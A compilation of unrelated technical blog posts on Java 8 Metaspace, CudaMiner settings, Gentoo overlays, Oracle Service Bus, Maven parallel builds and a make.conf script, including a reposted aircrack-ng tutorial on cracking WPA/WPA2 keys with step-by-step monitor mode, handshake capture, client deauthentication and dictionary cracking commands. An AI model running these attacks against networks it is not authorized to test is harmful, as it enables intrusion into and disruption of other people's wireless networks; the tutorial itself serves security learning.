Java 8 XX:PermSize and XX:MaxPermSize Disappearing

This is one of the new features of Java 8, part of JDK Enhancement Proposals 122:

Remove the permanent generation from the Hotspot JVM and thus the need to tune the size of the permanent generation.

The list of all the JEPs that will be included in Java 8 can be found on the JDK8 milestones page.

Reasons of ignoring these argument is permanent generation has been removed in HotSpot for JDK8 because of following drawbacks

  • Fixed size at startup – difficult to tune.
  • Internal Hotspot types were Java objects : Could move with full GC, opaque, not strongly typed and hard to debug, needed meta-metadata.
  • Simplify full collections : Special iterators for metadata for each collector
  • Want to deallocate class data concurrently and not during GC pause
  • Enable future improvements that were limited by PermGen.

The Permanent Generation (PermGen) space has completely been removed and is kind of replaced by a new space called Metaspace. The consequences of the PermGen removal is that obviously the PermSize and MaxPermSize JVM arguments are ignored and you will never get a java.lang.OutOfMemoryError: PermGen error.

Advantages of MetaSpace

  • Take advantage of Java Language Specification property : Classes and associated metadata lifetimes match class loader’s
  • Per loader storage area – Metaspace
  • Linear allocation only
  • No individual reclamation (except for RedefineClasses and class loading failure)
  • No GC scan or compaction
  • No relocation for metaspace objects

Metaspace Tuning

The maximum metaspace size can be set using the -XX:MaxMetaspaceSize flag, and the default is unlimited, which means that only your system memory is the limit. The -XX:MetaspaceSize tuning flag defines the initial size of metaspace If you don’t specify this flag, the Metaspace will dynamically re-size depending of the application demand at runtime.

Change enables other optimizations and features in the future

  • Application class data sharing
  • Young collection optimizations, G1 class unloading
  • Metadata size reductions and internal JVM footprint projects

There is improved GC performace also. More detail

Useful article:

CudaMiner Mining Kernel Configuration Guide

People often get confused about the kernel launch config on CUDA Miner and start putting random numbers in. So, this guide is to help you understand what you should put in the “-l” argument on CUDA Miner!

To begin with, you need to pass 3 values in this argument, the first being which kernel you’ll use for your card, the second is the number of SM(or SMX) your card has, and the 3rd and last value is the number of warps per SM(or SMX) your card is limited to.

BEFORE YOU READ: This guide is only valid for the newest version of cudaminer!(2013-12-18)

First value: Kernel = “-l (K)5×32″

You can easily find what your card achitecture is by running CUDA Miner in autotune mode, by removing the “-l” argument or using it’s value as “-l auto” and see what was reported.

You can either find it manually by searching your card’s compute version and using the right one for your card’s compute version in this link.

LLegacy cards with compute 1.x

SCurrently compiled for compute 1.2. Was used for Kepler cards but was replaced by “K”

FFermi cards with compute 2.x

KKepler cards with compute 3.0

TFor compute 3.5 cards such as Titan, GTX 780 and GK208 based

XExperimental kernel. Currently requires compute 3.5

Second value: SM(or SMX) units = “-l K(5)x32″

Use this link to find how many SM(or SMX) units your card has.

If there are multiple versions of your card, use GPU-Z or NVIDIA Inspector to see what is the name and revision of your GPU and compare to the ones on the wiki. You can also compare Memory/Core Clocks.

If your card doesn’t have the number of SMs specified, calculate it manually by doing the math with the number of SM per unit of Stream Processors. In the wiki they are displayed as the first number on the “Core Config” column. Example: GTX 660 has the Core Config “960:80:24” with 960 Stream Processors. Using the table below, divide this by 192, which gives 5 SMX.

Compute 1.0 and 1.1: 2 SFUs per unit of 8 Stream Processors.

Compute 1.2 and 1.3: 1 SFU per unit of 8 Stream Processors.

Compute 2.0: 1 SM per unit of 32 Stream Processors.

Compute 2.1: 1 SM per unit of 48 Stream Processors.

Compute 3.0 and 3.5: 1 SMX per unit of 192 Stream Processors.

Third value: Warps per SM(or SMX) unit = “-l K5x(32)

Compute 1.x cards are limited to [8] warps per SFU unit.

Compute 2.x cards are limited to [16] warps per SM unit. (Double-pumped process)

Compute 3.x cards are limited to [32] warps per SMX unit. (Quad-pumped process)

FERMI USERS: Test your values reversed to see what gives you the best results. Example: “F4x16”, test with “F16x4”. As long as you stay with multiples, it’s fine.


9800 GTX = “-l L32x8” = Legacy card (Compute 1.0), 32 Special Function Units, 8 warps per SFU

GTX 570 = “-l F15x16” = Fermi card (Compute 2.0), 15 Streaming Multiprocessors, 16 warps per SM

GTX 660 = “-l K5x32” = Kepler card (Compute 3.0), 5 Next-Gen Streaming Multiprocessors, 32 warps per SMX

GTX Titan = “-l T14x32” = Titan card (Compute 3.5), 14 Next-Gen Streaming Multiprocessors, 32 warps per SMX

My config as example:

cudaminer -r 10 -R 30 -T 30 -H 1 -i 0 -m 1 -d 0 -l K5x32 –no-autotune –url stratum+tcp://stratum.miningpool.ofchoice:1234 -u Username.Worker -p Password

.: Notes :.

I don’t have any legacy of fermi cards for testing. The SFU/warps count should make sense.

If you test it and it doesn’t work, try “-l auto”, or try running the benchmark tool on CUDA Miner to see what’s the best you can get: Create a new .bat file with this line in “cudaminer -D –benchmark”.

.: Tips :.

Tip 1: Cards with compute 1.2 may experience better hashrates with the “S” kernel prefix.

Tip 2: Cards with compute 2.1 and below may experience better hashrates using the 32bit version of cudaminer.

Tip 3: Cards with compute 3.x ignores the “-C” flag. Compute 2.1 and below may experience better hashrates with “-C 1” rather than “-C 2”.

Tip 4: The “-H” flag determines how much your CPU will help your GPU. If you are not mining with both GPU and CPU, the values of “0” and “1” should give you some more kh/s. “0” is singlethreaded help, “1” is multithreaded help, and “2” gives all the work to the GPU.

Thanks to:

stkris for helping me figure out how the Fermi occupancy calculation works by testing lots of numbers with his Fermi card! 🙂

Gentoo User Overlay: How to Host Own Overlay and Register within Layman

Your Gentoo overlay hosted on Gentoo machines like this one – wouldn’t that be sexy?

Just click here to open a bug (already set to product “Gentoo Infrastructure” component “Gentoo overlays”) providing

  • Overlay Name (matching "^user/[A-Za-z0-9_][A-Za-z0-9_-]*$")
  • An extra-short description
  • Owner name and e-mail (that’s you)
  • SSH pubkey you’ll be pushing with

That’s it. Once you’re running we can get you into the layman registry, too.

Finished 🙂

How to Crack WPA/WPA2

Tutorial: How to Crack WPA/WPA2

Version: 1.20 March 07, 2010
By: darkAudax


This tutorial walks you through cracking WPA/WPA2 networks which use pre-shared keys. I recommend you do some background reading to better understand what WPA/WPA2 is. The Wiki links page has a WPA/WPA2 section. The best document describing WPA is Wi-Fi Security – WEP, WPA and WPA2. This is the link to download the PDF directly. The WPA Packet Capture Explained tutorial is a companion to this tutorial.

WPA/WPA2 supports many types of authentication beyond pre-shared keys. aircrack-ng can ONLY crack pre-shared keys. So make sure airodump-ng shows the network as having the authentication type of PSK, otherwise, don’t bother trying to crack it.

There is another important difference between cracking WPA/WPA2 and WEP. This is the approach used to crack the WPA/WPA2 pre-shared key. Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute force techniques can be used against WPA/WPA2. That is, because the key is not static, so collecting IVs like when cracking WEP encryption, does not speed up the attack. The only thing that does give the information to start an attack is the handshake between client and AP. Handshaking is done when the client connects to the network. Although not absolutely true, for the purposes of this tutorial, consider it true. Since the pre-shared key can be from 8 to 63 characters in length, it effectively becomes impossible to crack the pre-shared key.

The only time you can crack the pre-shared key is if it is a dictionary word or relatively short in length. Conversely, if you want to have an unbreakable wireless network at home, use WPA/WPA2 and a 63 character password composed of random characters including special symbols.

The impact of having to use a brute force approach is substantial. Because it is very compute intensive, a computer can only test 50 to 300 possible keys per second depending on the computer CPU. It can take hours, if not days, to crunch through a large dictionary. If you are thinking about generating your own password list to cover all the permutations and combinations of characters and special symbols, check out this brute force time calculator first. You will be very surprised at how much time is required.

IMPORTANT This means that the passphrase must be contained in the dictionary you are using to break WPA/WPA2. If it is not in the dictionary then aircrack-ng will be unable to determine the key.

There is no difference between cracking WPA or WPA2 networks. The authentication methodology is basically the same between them. So the techniques you use are identical.

It is recommended that you experiment with your home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point, please remember to get permission from the owner prior to playing with it.

I would like to acknowledge and thank the Aircrack-ng team for producing such a great robust tool.

Please send me any constructive feedback, positive or negative. Additional troubleshooting ideas and tips are especially welcome.


First, this solution assumes:

  • You are using drivers patched for injection. Use the injection test to confirm your card can inject.
  • You are physically close enough to send and receive access point and wireless client packets. Remember that just because you can receive packets from them does not mean you may will be able to transmit packets to them. The wireless card strength is typically less then the AP strength. So you have to be physically close enough for your transmitted packets to reach and be received by both the AP and the wireless client. You can confirm that you can communicate with the specific AP by following these instructions.
  • You are using v0.9.1 or above of aircrack-ng. If you use a different version then some of the command options may have to be changed.

Ensure all of the above assumptions are true, otherwise the advice that follows will not work. In the examples below, you will need to change “ath0” to the interface name which is specific to your wireless card.

Equipment used

In this tutorial, here is what was used:

  • MAC address of PC running aircrack-ng suite: 00:0F:B5:88:AC:82
  • MAC address of the wireless client using WPA2: 00:0F:B5:FD:FB:C2
  • BSSID (MAC address of access point): 00:14:6C:7E:40:80
  • ESSID (Wireless network name): teddy
  • Access point channel: 9
  • Wireless interface: ath0

You should gather the equivalent information for the network you will be working on. Then just change the values in the examples below to the specific network.


Solution Overview

The objective is to capture the WPA/WPA2 authentication handshake and then use aircrack-ng to crack the pre-shared key.

This can be done either actively or passively. “Actively” means you will accelerate the process by deauthenticating an existing wireless client. “Passively” means you simply wait for a wireless client to authenticate to the WPA/WPA2 network. The advantage of passive is that you don’t actually need injection capability and thus the Windows version of aircrack-ng can be used.

Here are the basic steps we will be going through:

  1. Start the wireless interface in monitor mode on the specific AP channel
  2. Start airodump-ng on AP channel with filter for bssid to collect authentication handshake
  3. Use aireplay-ng to deauthenticate the wireless client
  4. Run aircrack-ng to crack the pre-shared key using the authentication handshake

Step 1 – Start the wireless interface in monitor mode

The purpose of this step is to put your card into what is called monitor mode. Monitor mode is the mode whereby your card can listen to every packet in the air. Normally your card will only “hear” packets addressed to you. By hearing every packet, we can later capture the WPA/WPA2 4-way handshake. As well, it will allow us to optionally deauthenticate a wireless client in a later step.

The exact procedure for enabling monitor mode varies depending on the driver you are using. To determine the driver (and the correct procedure to follow), run the following command:


On a machine with a Ralink, an Atheros and a Broadcom wireless card installed, the system responds:

 Interface       Chipset         Driver
 rausb0          Ralink RT73     rt73
 wlan0           Broadcom        b43 - [phy0]
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0)

The presence of a [phy0] tag at the end of the driver name is an indicator for mac80211, so the Broadcom card is using a mac80211 driver. Note that mac80211 is supported only since aircrack-ng v1.0-rc1, and it won’t work with v0.9.1. Both entries of the Atheros card show “madwifi-ng” as the driver – follow the madwifi-ng-specific steps to set up the Atheros card. Finally, the Ralink shows neither of these indicators, so it is using an ieee80211 driver – see the generic instructions for setting it up.

Step 1a – Setting up madwifi-ng

First stop ath0 by entering:

 airmon-ng stop ath0

The system responds:

 Interface       Chipset         Driver
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Enter “iwconfig” to ensure there are no other athX interfaces. It should look similar to this:

 lo        no wireless extensions.
 eth0      no wireless extensions.
 wifi0     no wireless extensions.

If there are any remaining athX interfaces, then stop each one. When you are finished, run “iwconfig” to ensure there are none left.

Now, enter the following command to start the wireless card on channel 9 in monitor mode:

 airmon-ng start wifi0 9

Note: In this command we use “wifi0” instead of our wireless interface of “ath0”. This is because the madwifi-ng drivers are being used.

The system will respond:

 Interface       Chipset         Driver
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

You will notice that “ath0” is reported above as being put into monitor mode.

To confirm the interface is properly setup, enter “iwconfig”.

The system will respond:

 lo        no wireless extensions.
 wifi0     no wireless extensions.
 eth0      no wireless extensions.
 ath0      IEEE 802.11g  ESSID:""  Nickname:""
        Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   
        Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  
        Retry:off   RTS thr:off   Fragment thr:off
        Encryption key:off
        Power Management:off
        Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm
        Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
        Tx excessive retries:0  Invalid misc:0   Missed beacon:0

In the response above, you can see that ath0 is in monitor mode, on the 2.452GHz frequency which is channel 9 and the Access Point shows the MAC address of your wireless card. Only the madwifi-ng drivers show the card MAC address in the AP field, other drivers do not. So everything is good. It is important to confirm all this information prior to proceeding, otherwise the following steps will not work properly.

To match the frequency to the channel, check out: . This will give you the frequency for each channel.

Step 1b – Setting up mac80211 drivers

Unlike madwifi-ng, you do not need to remove the wlan0 interface when setting up mac80211 drivers. Instead, use the following command to set up your card in monitor mode on channel 9:

 airmon-ng start wlan0 9

The system responds:

 Interface       Chipset         Driver
 wlan0           Broadcom        b43 - [phy0]
                                 (monitor mode enabled on mon0)

Notice that airmon-ng enabled monitor-mode on mon0. So, the correct interface name to use in later parts of the tutorial is mon0. Wlan0 is still in regular (managed) mode, and can be used as usual, provided that the AP that wlan0 is connected to is on the same channel as the AP you are attacking, and you are not performing any channel-hopping.

To confirm successful setup, run “iwconfig”. The following output should appear:

 lo        no wireless extensions.
 eth0      no wireless extensions.
 wmaster0  no wireless extensions.
 wlan0     IEEE 802.11bg  ESSID:""
           Mode:Managed  Frequency:2.452 GHz  Access Point: Not-Associated
           Tx-Power=0 dBm
           Retry min limit:7   RTS thr:off   Fragment thr=2352 B
           Encryption key:off
           Power Management:off
           Link Quality:0  Signal level:0  Noise level:0
           Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
           Tx excessive retries:0  Invalid misc:0   Missed beacon:0
 mon0      IEEE 802.11bg  Mode:Monitor  Frequency:2.452 GHz  Tx-Power=0 dBm
           Retry min limit:7   RTS thr:off   Fragment thr=2352 B
           Encryption key:off
           Power Management:off
           Link Quality:0  Signal level:0  Noise level:0
           Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
           Tx excessive retries:0  Invalid misc:0   Missed beacon:0

Here, mon0 is seen as being in monitor mode, on channel 9 (2.452GHz). Unlike madwifi-ng, the monitor interface has no Access Point field at all. Also notice that wlan0 is still present, and in managed mode – this is normal. Because both interfaces share a common radio, they must always be tuned to the same channel – changing the channel on one interface also changes channel on the other one.

Step 1c – Setting up other drivers

For other (ieee80211-based) drivers, simply run the following command to enable monitor mode (replace rausb0 with your interface name):

 airmon-ng start rausb0 9

The system responds:

 Interface       Chipset         Driver
 rausb0          Ralink          rt73 (monitor mode enabled)

At this point, the interface should be ready to use.

Step 2 – Start airodump-ng to collect authentication handshake

The purpose of this step is to run airodump-ng to capture the 4-way authentication handshake for the AP we are interested in.


 airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0


  • -c 9 is the channel for the wireless network
  • -bssid 00:14:6C:7E:40:80 is the access point MAC address. This eliminates extraneous traffic.
  • -w psk is the file name prefix for the file which will contain the IVs.
  • ath0 is the interface name.

Important: Do NOT use the “--ivs” option. You must capture the full packets.

Here what it looks like if a wireless client is connected to the network:

  CH  9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80
  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
  00:14:6C:7E:40:80   39 100       51      116   14   9  54  WPA2 CCMP   PSK  teddy                           
  BSSID              STATION            PWR  Lost  Packets  Probes                                             
  00:14:6C:7E:40:80  00:0F:B5:FD:FB:C2   35     0      116

In the screen above, notice the “WPA handshake: 00:14:6C:7E:40:80” in the top right-hand corner. This means airodump-ng has successfully captured the four-way handshake.

Here it is with no connected wireless clients:

  CH  9 ][ Elapsed: 4 s ][ 2007-03-24 17:51 
  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
  00:14:6C:7E:40:80   39 100       51        0    0   9  54  WPA2 CCMP   PSK  teddy                           
  BSSID              STATION            PWR  Lost  Packets  Probes

Troubleshooting Tip

See the Troubleshooting Tips section below for ideas.

To see if you captured any handshake packets, there are two ways. Watch the airodump-ng screen for “ WPA handshake: 00:14:6C:7E:40:80” in the top right-hand corner. This means a four-way handshake was successfully captured. See just above for an example screenshot.

Use Wireshark and apply a filter of “eapol”. This displays only eapol packets you are interested in. Thus you can see if capture contains 0,1,2,3 or 4 eapol packets.

Step 3 – Use aireplay-ng to deauthenticate the wireless client

This step is optional. If you are patient, you can wait until airodump-ng captures a handshake when one or more clients connect to the AP. You only perform this step if you opted to actively speed up the process. The other constraint is that there must be a wireless client currently associated with the AP. If there is no wireless client currently associated with the AP, then you have to be patient and wait for one to connect to the AP so that a handshake can be captured. Needless to say, if a wireless client shows up later and airodump-ng did not capture the handshake, you can backtrack and perform this step.

This step sends a message to the wireless client saying that that it is no longer associated with the AP. The wireless client will then hopefully reauthenticate with the AP. The reauthentication is what generates the 4-way authentication handshake we are interested in collecting. This is what we use to break the WPA/WPA2 pre-shared key.

Based on the output of airodump-ng in the previous step, you determine a client which is currently connected. You need the MAC address for the following. Open another console session and enter:

 aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0


  • -0 means deauthentication
  • 1 is the number of deauths to send (you can send multiple if you wish)
  • -a 00:14:6C:7E:40:80 is the MAC address of the access point
  • -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
  • ath0 is the interface name

Here is what the output looks like:

 11:09:28  Sending DeAuth to station   -- STMAC: [00:0F:B5:34:30:30]

With luck this causes the client to reauthenticate and yield the 4-way handshake.

Troubleshooting Tips

  • The deauthentication packets are sent directly from your PC to the clients. So you must be physically close enough to the clients for your wireless card transmissions to reach them. To confirm the client received the deauthentication packets, use tcpdump or similar to look for ACK packets back from the client. If you did not get an ACK packet back, then the client did not “hear” the deauthentication packet.

Step 4 – Run aircrack-ng to crack the pre-shared key

The purpose of this step is to actually crack the WPA/WPA2 pre-shared key. To do this, you need a dictionary of words as input. Basically, aircrack-ng takes each word and tests to see if this is in fact the pre-shared key.

There is a small dictionary that comes with aircrack-ng – “password.lst”. This file can be found in the “test” directory of the aircrack-ng source code. The Wiki FAQ has an extensive list of dictionary sources. You can use John the Ripper (JTR) to generate your own list and pipe them into aircrack-ng. Using JTR in conjunction with aircrack-ng is beyond the scope of this tutorial.

Open another console session and enter:

aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap


  • -w password.lst is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory.
  • *.cap is name of group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files.

Here is typical output when there are no handshakes found:

 Opening psk-01.cap
 Opening psk-02.cap
 Opening psk-03.cap
 Opening psk-04.cap
 Read 1827 packets.

 No valid WPA handshakes found.

When this happens you either have to redo step 3 (deauthenticating the wireless client) or wait longer if you are using the passive approach. When using the passive approach, you have to wait until a wireless client authenticates to the AP.

Here is typical output when handshakes are found:

 Opening psk-01.cap
 Opening psk-02.cap
 Opening psk-03.cap
 Opening psk-04.cap
 Read 1827 packets.
 #  BSSID              ESSID                     Encryption

 1  00:14:6C:7E:40:80  teddy                     WPA (1 handshake)
 Choosing first network as target.

Now at this point, aircrack-ng will start attempting to crack the pre-shared key. Depending on the speed of your CPU and the size of the dictionary, this could take a long time, even days.

Here is what successfully cracking the pre-shared key looks like:

                               Aircrack-ng 0.8
                 [00:00:00] 2 keys tested (37.20 k/s)
                         KEY FOUND! [ 12345678 ]
    Master Key     : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E 
                     B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD 
    Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98 
                     CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40 
                     FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E 
                     2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71 
    EAPOL HMAC     : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB

Troubleshooting Tips

I Cannot Capture the Four-way Handshake!

It can sometimes be tricky to capture the four-way handshake. Here are some troubleshooting tips to address this:

  • Your monitor card must be in the same mode as the both the client and Access Point. So, for example, if your card was in “B” mode and the client/AP were using “G” mode, then you would not capture the handshake. This is especially important for new APs and clients which may be “turbo” mode and/or other new standards. Some drivers allow you to specify the mode. Also, iwconfig has an option “modulation” that can sometimes be used. Do “man iwconfig” to see the options for “modulation”. For information, 1, 2, 5.5 and 11Mbit are ‘b’, 6, 9, 12, 18, 24, 36, 48, 54Mbit are ‘g’.
  • Sometimes you also need to set the monitor-mode card to the same speed. IE auto, 1MB, 2MB, 11MB, 54MB, etc.
  • Be sure that your capture card is locked to the same channel as the AP. You can do this by specifying “-c <channel of AP>” when you start airodump-ng.
  • Be sure there are no connection managers running on your system. This can change channels and/or change mode without your knowledge.
  • You are physically close enough to receive both access point and wireless client packets. The wireless card strength is typically less then the AP strength.
  • Conversely, if you are too close then the received packets can be corrupted and discarded. So you cannot be too close.
  • Make sure to use the drivers specified on the wiki. Depending on the driver, some old versions do not capture all packets.
  • Ideally, connect and disconnect a wireless client normally to generate the handshake.
  • If you use the deauth technique, send the absolute minimum of packets to cause the client to reauthenticate. Normally this is a single deauth packet. Sending an excessive number of deauth packets may cause the client to fail to reconnect and thus it will not generate the four-way handshake. As well, use directed deauths, not broadcast. To confirm the client received the deauthentication packets, use tcpdump or similar to look for ACK packets back from the client. If you did not get an ACK packet back, then the client did not “hear” the deauthentication packet.
  • Try stopping the radio on the client station then restarting it.
  • Make sure you are not running any other program/process that could interfere such as connection managers, Kismet, etc.
  • Review your captured data using the WPA Packet Capture Explained tutorial to see if you can identify the problem. Such as missing AP packets, missing client packets, etc.

Unfortunately, sometimes you need to experiment a bit to get your card to properly capture the four-way handshake. The point is, if you don’t get it the first time, have patience and experiment a bit. It can be done!

Another approach is to use Wireshark to review and analyze your packet capture. This can sometimes give you clues as to what is wrong and thus some ideas on how to correct it. The WPA Packet Capture Explained tutorial is a companion to this tutorial and walks you through what a “normal” WPA connection looks like. As well, see the FAQ for detailed information on how to use Wireshark.

In an ideal world, you should use a wireless device dedicated to capturing the packets. This is because some drivers such as the RTL8187L driver do not capture packets the card itself sends. Also, always use the driver versions specified on the wiki. This is because some older versions of the drivers such as the RT73 driver did not capture client packets.

When using Wireshark, the filter “eapol” will quickly display only the EAPOL packets. Based on what EAPOL packets are actually in the capture, determine your correction plan. For example, if you are missing the client packets then try to determine why and how to collect client packets.

To dig deep into the packet analysis, you must start airodump-ng without a BSSID filter and specify the capture of the full packet, not just IVs. Needless to say, it must be locked to the AP channel. The reason for eliminating the BSSID filter is to ensure all packets including acknowledgments are captured. With a BSSID filter, certain packets are dropped from the capture.

Every packet sent by client or AP must be acknowledged. This is done with an “acknowledgment” packet which has a destination MAC of the device which sent the original packet. If you are trying to deauthenticate a client, one thing to check is that you receive the “ack” packet. This confirms the client received the deauth packet. Failure to receive the “ack” packet likely means that the client is out of transmission range. Thus failure.

When it comes to analyzing packet captures, it is impossible to provide detailed instructions. I have touched on some techniques and areas to look at. This is an area which requires effort to build your skills on both WPA/WPA2 plus how to use Wireshark.

aircrack-ng says “0 handshakes”

Check the “I Cannot Capture the Four-way Handshake!” troubleshooting tip.

aircrack-ng says “No valid WPA handshakes found”

Check the “I Cannot Capture the Four-way Handshake!” troubleshooting tip.

Dynamic HTTP endpoint in Oracle Service Bus 12c based on values in a database routing table

Joris Visscher

This article outlines how to set a dynamic endpoint in an OSB HTTP Business Service. The endpoint is retrieved from a routing table which resides in an Oracle 12c database.

Components used for this solution:

  1. Ubuntu Linux 14.04 64bit
    1. JDeveloper, running the Quick Start Oracle Fusion Middleware suite
      1. Oracle Service Bus 12c
      2. Oracle Weblogic 12c
      3. OSB Project location:
    2. Oracle Virtualbox Developer Days image for DB 12c, running:
      1. Oracle Database 12c
    3. Oracle SQL Developer 4

This picture shows the running solution in the OSB test console:

Oracle Service Bus Console 12c : Pipeline Testing - DBRouting_v1Pipeline - Google Chrome_019

Database table preparation

We need a routing table in our schema, I’m using this table setup:

    "ROUTE" VARCHAR2(50),
Where ROUTE stands for the identifier and ENDPOINT is the HTTP endpoint we try to reach.
I’ve inserted two rows:
Insert into ROUTINGTABLE (ROUTE,ENDPOINT) values ('SalesOrder','http://localhost:7101/salesEndpoint');
Insert into ROUTINGTABLE (ROUTE,ENDPOINT) values ('FinanceReceipt','http://localhost:7101/financeEndpoint');
These two endpoints will…

View original post 365 more words

using CDATA in the Oracle Service Bus

J@n van Zoggel

>In our project when an error occured the following Error structure must be returned to the service consumer.

In a case of a validation error the consumer would receive the following message where description is a concat of $fault/ctx:errorCode and $fault/ctx:reason

The limitation here is off course that the real description (the $fault variable) is not visible for the service consumer. Since the $fault contains an XML-structure we need a mechanism as CDATA to encapsulate this in the response message.

The following blogpost is a simplified result of the actual project, but should give a general idea:

So we used the above solution with a Replace action in the common Error Handler. In our data model the element is repeating so we made a choice to add a second element.

This will result in a result like:

The bea-serialize function helps us to transform an XML input to a string…

View original post 74 more words

Maven Parallel Build

Maven 3.x has the capability to perform parallel builds. The command is as follows:

mvn -T 4 clean install # Builds with 4 threads
mvn -T 1C clean install # 1 thread per cpu core
mvn -T 1.5C clean install # 1.5 thread per cpu core

This build-mode analyzes your project’s dependency graph and schedules modules that can be built in parallel according to the dependency graph of your project.

Experimental feature for 3.0!

The parallel build feature has been subject to extensive testing, but the maven ecosystem is diverse so there will be undiscovered issues. We recommend that users of the parallel build feature establish their own reference as to how well this works for their project, preferably starting with everyday builds as opposed to final production releases.

The parallel build functionality is brand new, and although they are tested with quite a few projects they do not have the general wisdom accumulated by running on multiple project types on multiple platforms within the community. So take a little care.

What performance boost can be expected ?

This depends greatly on your module structure, but the following observations have been made:

  • 20-50% speed improvement is quite common.
  • Distributing tests among your modules is likely to improve performance, putting all your tests in one module decreases it – unless you run one of the parallel surefire test providers.
  • Running tests in parallel within a single surefire-instance is a little different from running multiple surefire-runs (from separate projects), since there will be different classloaders. Remember that tcp/ip ports and files are still singletons.

Plugin/Settings compatibility

The functionality within the Maven3 core is thread safe and well behaved, but the maven ecosystem consists of a large number of subsystems, and a lot of plugins have a large number of dependencies. Not all of these plugins/libraries were written with thread safety in mind. As of beta-2 maven 3 will warn noisily of any plugins present in the build that are not @threadSafe.

The following plugins/settings are KNOWN to have incompatibilities when running any of the parallel modes:

  • Surefire with forkMode=never, surefire [2.6,) asserts this.
  • maven-modello-plugin, fixed in [1.4,)
  • All maven-archiver clients (EAR, EJB, JAR, WAR etc), see related/links section. EAR, EJB, JAR and WAR are fixed in latest version.

Known non-thread safe libraries

Known thread safety problems have been fixed in the following library versions:

plexus-utils 2.0.5
maven-archiver 2.4.1
plexus-archiver 1.0
plexus-io 1.0

Thread safe plugins and libraries

  • Maven Clean Plugin 2.4.1
  • Maven Compiler Plugin 2.3.1
  • Maven Install Plugin 2.3.1
  • Maven Resources Plugin 2.4.3
  • Maven Surefire Plugin 2.6
  • Maven EAR Plugin 2.4.2
  • Maven EJB Plugin 2.3
  • Maven JAR Plugin 2.3.1
  • Maven WAR Plugin 2.1
  • Maven Shade Plugin 1.3.3
  • Maven Changes Plugin 2.4
  • Maven Checkstyle Plugin 2.6
  • Maven Antrun Plugin 1.4
  • Maven Assembly Plugin 2.2.1
  • Maven GPG Plugin 1.1
  • Maven Plugin Plugin 2.7
  • Maven Remote Resources Plugin 1.2.1 (1.2 is not threadsafe)
  • Maven Source Plugin 2.1.2
  • maven Enforcer Plugin 1.0.1

Known issues

It is not required to report jiras for these issues:

The console output of both parallel modes is not sorted in any way, which can be a bit confusing.

Mojo thread safety assertion checklist

Sometimes it can be hard to determine if a plugin and the underlying libraries are thread-safe, so when adding @threadSafe the following checklist can be used:

  • Check all static fields/variables in plugin/plugin code are not subject to threading problems.
    You might want to pay special attention to static member variables of the subclasses of “java.text.Format” (NumeberFormat, DateFormat etc), most of which
    are not threadsafe and cannot be shared as static variables.
  • Check any plexus components.xml; if the components defined are singletons they need to be threadsafe.
  • Check for presence of known tainted libraries.
  • Check thread safety of any other third party libraries. This last item can be a bit hard, but inquiries on mailing lists can get you a long way.

This checklist qualifies for a “simple thread safety” review of a mojo.

If you need to learn more about multithreading and the java memory model it is probably wise to start off with a book like “Java Concurrency In Practice” or similar.

If a mojo uses a known-non-threadsafe external dependency, you may want to do something like this:

public class MyMojo
    extends AbstractMojo
  private static final Object lock = new Object();
  public void execute()
     synchronized( lock)
         // Main mojo code

How Execution is evaluated

Each node in the graph represents a module in a multi-module build, the “levels” simply indicate the distance to the first module in the internal reactor dependency graph. Maven calculates this graph based on declared inter-module dependencies for a multi-module build. Note that the parent maven project is also a dependency, which explains why there is a single node on top of most project graphs. Dependencies outside the reactor do not influence this graph.

For simplicity; let’s assume all modules have an equal running time. This build should have level 0 running first, then a fanout of up to 5 parallel on level 1. On level 2 you’ll be running 3 parallel modules, and 7 on 3, 5 on level 4.

This goes by declared dependencies in the pom, and there is no good log of how this graph is actually evaluated. (I was hoping to render the actual execution graph, but never got around to finding a cool tool/way to do it – plaintext ascii in the -X log would be one option).

Of course, in real life your modules do not take equal amounts of time. Significant gains are common when the project has one or more “api” modules and dependencies on the “api” modules (and just bring the “impl” version of the module into the actual assembly that will be started). This design normally means your big chunky modules depend on lightweight “api” modules that build quickly.

The parallel build feature rewards “correct” modularizations. If your project has degenerated inter-module dependencies (execessive dependencies inside reactor), you will probably see gains by cleaning up the dependencies.

Gentoo : Autoconfigure number of CPU in make.conf


Ever wanted a script that just adapts make.conf to number of cpu cores.
Well, here’s my script, surely improvable but maybe useful.

It will count the number of cpu nodes.
Then make.conf gets backuped and edited accordingly.

We have 8 cpu cores, so anything like:

  • MAKEOPTS=”-j2
  • MAKEOPTS=”-j2 -l1
  • MAKEOPTS=”${MAKEOPTS} -j5 -l3.85
  • EMERGE_DEFAULT_OPTS=”${EMERGE_DEFAULT_OPTS} -j4 –load-average=3.75

becomes this:

  • MAKEOPTS=”-j9
  • MAKEOPTS=”-j9 -l7.95
  • MAKEOPTS=”${MAKEOPTS} -j9 -l7.95
